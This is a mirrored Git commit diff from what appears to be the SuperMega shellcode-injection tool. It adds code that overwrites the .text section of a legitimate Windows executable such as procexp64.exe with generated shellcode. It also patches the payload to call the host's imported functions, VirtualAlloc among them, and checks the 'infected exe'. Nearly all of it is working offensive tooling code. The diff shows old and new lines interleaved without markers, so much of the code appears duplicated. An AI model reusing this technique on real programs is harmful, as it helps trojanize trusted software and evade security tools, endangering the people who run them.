mirror of
https://github.com/dobin/SuperMega
synced 2026-06-03 01:27:11 +00:00
feature: iat support tmp
This commit is contained in:
@@ -4,6 +4,7 @@ import time
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import shutil
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import shutil
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import pathlib
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import pathlib
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import sys
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import sys
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import pefile
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from config import config
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from config import config
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@@ -15,6 +16,54 @@ verify_filename = r'C:\Temp\a'
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build_dir = "build"
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build_dir = "build"
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def remove_trailing_null_bytes(data):
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for i in range(len(data) - 1, -1, -1):
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if data[i] != b'\x00'[0]: # Check for a non-null byte
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return data[:i + 1]
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return b'' # If the entire sequence is null bytes
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def get_code_section(pe_file):
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try:
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# Load the PE file
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pe = pefile.PE(pe_file)
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# Iterate over the sections
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for section in pe.sections:
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# Check if this is the code section
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if '.text' in section.Name.decode().rstrip('\x00'):
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data = section.get_data()
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data = remove_trailing_null_bytes(data)
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print(" > 0x{:X} Code Size: {} (raw code section size: {})".format(
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section.VirtualAddress,
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len(data), section.SizeOfRawData))
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return data
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else:
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print("Code section not found.")
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except FileNotFoundError:
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print(f"File not found: {pe_file}")
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except pefile.PEFormatError:
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print(f"Invalid PE file: {pe_file}")
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def write_code_section(pe_file, new_data):
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# Load the PE file
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pe = pefile.PE(pe_file)
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# Iterate over the sections
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for section in pe.sections:
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# Check if this is the code section
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if '.text' in section.Name.decode().rstrip('\x00'):
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file_offset = section.PointerToRawData
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with open(pe_file, 'r+b') as f:
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f.seek(file_offset)
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f.write(new_data)
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print("Successfully overwritten the .text section with new data.")
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break
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def clean_files():
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def clean_files():
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print("--[ Remove old files ]")
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print("--[ Remove old files ]")
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+32
-2
@@ -1,5 +1,30 @@
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import sys
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import sys
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import pefile
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import pefile
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import pprint
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from keystone import Ks, KS_ARCH_X86, KS_MODE_64
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from capstone import Cs, CS_ARCH_X86, CS_MODE_64
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def assemble_and_disassemble_jump(current_address, destination_address):
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print("Make jmp from 0x{:X} to 0x{:X}".format(
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current_address, destination_address
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))
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# Calculate the relative offset
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# For a near jump, the instruction length is typically 5 bytes (E9 xx xx xx xx)
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offset = destination_address - current_address
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# Assemble the jump instruction using Keystone
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ks = Ks(KS_ARCH_X86, KS_MODE_64)
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encoding, _ = ks.asm(f"call qword ptr ds:[{offset}]")
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machine_code = bytes(encoding)
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# Disassemble the machine code using Capstone
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cs = Cs(CS_ARCH_X86, CS_MODE_64)
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disassembled = next(cs.disasm(machine_code, current_address))
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print(f"Machine Code: {' '.join(f'{byte:02x}' for byte in machine_code)}")
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print(f"Disassembled: {disassembled.mnemonic} {disassembled.op_str}")
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return machine_code
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def extract_iat(pe):
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def extract_iat(pe):
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@@ -14,6 +39,8 @@ def extract_iat(pe):
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dll_name = entry.dll.decode('utf-8')
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dll_name = entry.dll.decode('utf-8')
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imp_name = imp.name.decode('utf-8')
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imp_name = imp.name.decode('utf-8')
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imp_addr = imp.address
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imp_addr = imp.address
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#pprint.pprint(imp.keys())
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#print(type(imp))
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#print("{} {} - 0x{:08X}".format(
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#print("{} {} - 0x{:08X}".format(
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# dll_name,
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# dll_name,
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@@ -47,8 +74,11 @@ def resolve_iat_capabilities(needed_capabilities, inject_exe):
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print("IAT: ")
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print("IAT: ")
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for cap in needed_capabilities:
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for cap in needed_capabilities:
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needed_capabilities[cap] = get_addr_for(iat, cap)
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needed_capabilities[cap] = {
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print(" {}: {}".format(cap, needed_capabilities[cap]))
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"id": None,
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"addr": get_addr_for(iat, cap),
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}
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#print(" {}: {}".format(cap, needed_capabilities[cap]))
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+1
-30
@@ -1,4 +1,5 @@
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import pefile
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import pefile
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import pprint
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from helper import *
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from helper import *
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from config import config
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from config import config
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@@ -26,33 +27,3 @@ def make_shc_from_asm(asm_file, exe_file, shc_file):
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return code
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return code
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#print("---[ Shellcode from {} written to: {} (size: {}) ]".format(exe_file, shc_file, len(code)))
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#print("---[ Shellcode from {} written to: {} (size: {}) ]".format(exe_file, shc_file, len(code)))
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def get_code_section(pe_file):
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try:
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# Load the PE file
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pe = pefile.PE(pe_file)
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# Iterate over the sections
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for section in pe.sections:
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# Check if this is the code section
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if '.text' in section.Name.decode().rstrip('\x00'):
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data = section.get_data()
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data = remove_trailing_null_bytes(data)
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print(" > Code Size: {} (raw code section size: {})".format(
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len(data), section.SizeOfRawData))
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return data
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else:
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print("Code section not found.")
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except FileNotFoundError:
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print(f"File not found: {pe_file}")
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except pefile.PEFormatError:
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print(f"Invalid PE file: {pe_file}")
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def remove_trailing_null_bytes(data):
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for i in range(len(data) - 1, -1, -1):
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if data[i] != b'\x00'[0]: # Check for a non-null byte
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return data[:i + 1]
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return b'' # If the entire sequence is null bytes
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+27
-5
@@ -1,5 +1,7 @@
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from helper import *
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from helper import *
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from config import config
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from config import config
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import os
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import pprint
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def make_c_to_asm(c_file, asm_file, payload_len, exe_capabilities):
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def make_c_to_asm(c_file, asm_file, payload_len, exe_capabilities):
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@@ -52,10 +54,25 @@ def make_c_to_asm(c_file, asm_file, payload_len, exe_capabilities):
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return asm
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return asm
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def bytes_to_asm_db(byte_data):
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# Convert each byte to a string in hexadecimal format suffixed with 'h'
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hex_values = [f"0{byte:02x}H" for byte in byte_data]
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# Join the hex values into a single string with ', ' as separator
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formatted_string = ', '.join(hex_values)
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return "\tDB " + formatted_string
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def fixup_asm_file(filename, payload_len, exe_capabilities):
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def fixup_asm_file(filename, payload_len, exe_capabilities):
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with open(filename, 'r') as asmfile:
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with open(filename, 'r', encoding='utf-8') as asmfile:
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lines = asmfile.readlines()
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lines = asmfile.readlines()
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#pprint.pprint(exe_capabilities)
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# FUCK
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for idx, line in enumerate(lines):
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if "jmp\tSHORT" in lines[idx]:
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lines[idx] = lines[idx].replace("SHORT", "")
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# do IAT reuse
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# do IAT reuse
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for idx, line in enumerate(lines):
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for idx, line in enumerate(lines):
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# Remove definition:
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# Remove definition:
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@@ -72,10 +89,15 @@ def fixup_asm_file(filename, payload_len, exe_capabilities):
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if func_name not in exe_capabilities or exe_capabilities[func_name] == None:
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if func_name not in exe_capabilities or exe_capabilities[func_name] == None:
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print("Capabilities not: {}".format(func_name))
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print("Capabilities not: {}".format(func_name))
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else:
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else:
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func_addr = exe_capabilities[func_name]
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randbytes = os.urandom(6)
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lines[idx] = "\tcall rax\r\n"
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lines[idx] = bytes_to_asm_db(randbytes) + "\r\n"
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lines.insert(idx, "\tmov rax, [rax]\r\n")
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exe_capabilities[func_name]["id"] = randbytes
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lines.insert(idx, "\tmov rax, {:X}H\r\n".format(func_addr))
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#func_addr = exe_capabilities[func_name]
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#lines[idx] = "\tcall main\r\n"
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#lines[idx] = "\tcall rax\r\n"
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#lines.insert(idx, "\tmov rax, [rax]\r\n")
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#lines.insert(idx, "\tmov rax, {:X}H\r\n".format(func_addr))
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#print(" > Replace__imp_MessageBoxW at line: {}".format(idx))
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#print(" > Replace__imp_MessageBoxW at line: {}".format(idx))
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#lines[idx] = lines[idx].replace("__imp_MessageBoxW", "ds:[0x123]")
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#lines[idx] = lines[idx].replace("__imp_MessageBoxW", "ds:[0x123]")
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+47
-2
@@ -1,8 +1,9 @@
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from helper import *
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from helper import *
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import shutil
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import shutil
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import pprint
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from pehelper import *
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def inject_exe(shc_file, exe_in, exe_out, mode, exe_capabilities):
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def inject_exe(shc_file, exe_in, exe_out, mode):
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print("--[ Injecting: {} into: {} -> {} ]".format(
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print("--[ Injecting: {} into: {} -> {} ]".format(
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shc_file, exe_in, exe_out
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shc_file, exe_in, exe_out
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))
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))
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@@ -18,6 +19,50 @@ def inject_exe(shc_file, exe_in, exe_out, mode):
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], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
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], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
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# get code section
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# get offset from start of code
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# get offset of code setion?
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####
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print("-------------")
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#pprint.pprint(exe_capabilities)
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for cap in exe_capabilities:
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print("-> 0x{:X}\t\t{}".format(
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exe_capabilities[cap]["addr"],
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cap,
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#exe_capabilities["id"],
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))
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print("-------------")
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code = get_code_section(exe_out)
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# replace IAT in shellcode
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for cap in exe_capabilities:
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#print("AAAA: " + str(cap))
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if not exe_capabilities[cap]["id"] in code:
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print("Not found, abort")
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raise Exception()
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off = code.index(exe_capabilities[cap]["id"])
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current_address = off + 0x140000000 + 4096
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print(" Off: 0x{:X}".format(off))
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print(" Off2: 0x{:X}".format(current_address)) # base addr
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#print(" Diff: 0x{:X}".format())
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destination_address = exe_capabilities[cap]["addr"]
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jmp = assemble_and_disassemble_jump(
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current_address, destination_address
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)
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print("ONE: {}".format(jmp))
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print("TWO: {}".format(exe_capabilities[cap]["id"]))
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print("Found! replacing")
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code = code.replace(
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exe_capabilities[cap]["id"], jmp)
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write_code_section(exe_out, code)
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def verify_injected_exe(exefile):
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def verify_injected_exe(exefile):
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print("---[ Verify infected exe: {} ]".format(exefile))
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print("---[ Verify infected exe: {} ]".format(exefile))
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# remove indicator file
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# remove indicator file
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+17
-7
@@ -84,16 +84,18 @@ options_verify = {
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# injecting into exe
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# injecting into exe
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"inject_exe": True,
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"inject_exe": True,
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"inject_mode": "1,1",
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"inject_mode": "1,1",
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"inject_exe_in": "exes/procexp64.exe",
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#"inject_exe_in": "exes/procexp64.exe",
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"inject_exe_out": "out/procexp64-a.exe",
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"inject_exe_in": "exes/iattest-full.exe",
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#"inject_exe_out": "out/procexp64-a.exe",
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"inject_exe_out": "out/iatttest-full-a.exe",
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# For debugging: Can disable some steps
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# For debugging: Can disable some steps
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"generate_asm_from_c": True, # phase 2
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"generate_asm_from_c": True, # phase 2
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"generate_shc_from_asm": True, # phase 3
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"generate_shc_from_asm": True, # phase 3
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# cleanup
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# cleanup
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"cleanup_files_on_start": True,
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"cleanup_files_on_start": False,
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"cleanup_files_on_exit": True, # all is just in out/
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"cleanup_files_on_exit": False, # all is just in out/
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# doesnt work
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# doesnt work
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"obfuscate_shc_loader": False,
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"obfuscate_shc_loader": False,
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@@ -161,7 +163,9 @@ def start(options):
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# Check: Destination EXE capabilities
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# Check: Destination EXE capabilities
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exe_capabilities = {
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exe_capabilities = {
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"MessageBoxW": None,
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#"MessageBoxW": None,
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"GetEnvironmentVariableW": None,
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"VirtualAlloc": None,
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}
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}
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resolve_iat_capabilities(exe_capabilities, options["inject_exe_in"])
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resolve_iat_capabilities(exe_capabilities, options["inject_exe_in"])
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@@ -213,7 +217,8 @@ def start(options):
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if options["verify"]:
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if options["verify"]:
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print("--[ Verify final shellcode ]")
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print("--[ Verify final shellcode ]")
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if not verify_shellcode(main_shc_file):
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if not verify_shellcode(main_shc_file):
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return
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print("Could not verify, still continuing")
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#return
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if options["try_start_final_shellcode"]:
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if options["try_start_final_shellcode"]:
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print("--[ Test Append shellcode ]")
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print("--[ Test Append shellcode ]")
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@@ -225,7 +230,12 @@ def start(options):
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if options["inject_exe"]:
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if options["inject_exe"]:
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debug_data["original_exe"] = file_readall_binary(options["inject_exe_in"])
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debug_data["original_exe"] = file_readall_binary(options["inject_exe_in"])
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inject_exe(main_shc_file, options["inject_exe_in"], options["inject_exe_out"], options["inject_mode"])
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inject_exe(
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main_shc_file,
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options["inject_exe_in"],
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options["inject_exe_out"],
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options["inject_mode"],
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exe_capabilities)
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if options["verify"]:
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if options["verify"]:
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print("--[ Verify final exe ]")
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print("--[ Verify final exe ]")
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if verify_injected_exe(options["inject_exe_out"]):
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if verify_injected_exe(options["inject_exe_out"]):
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Reference in New Issue
Block a user